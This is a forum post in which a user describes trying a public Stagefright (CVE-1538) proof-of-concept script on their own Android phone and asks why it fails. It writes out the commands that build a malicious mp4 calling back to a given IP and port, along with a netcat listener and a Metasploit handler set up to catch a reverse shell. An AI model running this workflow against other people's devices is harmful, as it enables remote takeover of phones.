Jump to content

0v3rl04d

Members
  • Posts

    4
  • Joined

  • Last visited

Posts posted by 0v3rl04d

  1. Hi guys,

    after the discovery of the Stagefright bug, the researcher of Zimperium have post a python script for the specific module CVE 1538.

    I've download it and i've try to execute this on my Android phone with Lollipop 5.0. Before this, i've downloaded the apk of zimperium to test if my phone is vulnerable.

    The app show me, in green, the module CVE-1538 e other... After this, on my linux pc with python 2.7.x, i've renamed the script in mp4.py for resolve an error of import.

    After this i've tried to generate the file.mp4 with this command:

    $python2 mp4.py -c [LAN IP] -p 4444

    The script correctly generate an file.mp4 without an error.

    After i've launch a listener with:

    $netcat -l -p 4444

    I've sended the file.mp4 to my smartphone and i've tried to exec this.

    The terminal with netcat don't show anything, no result, nisba, nada... I've tried with metasploit listener with multi/hanlder but with a same result.

    Any solution? Thanks everyone and sorry for my english ;-P

×
×
  • Create New...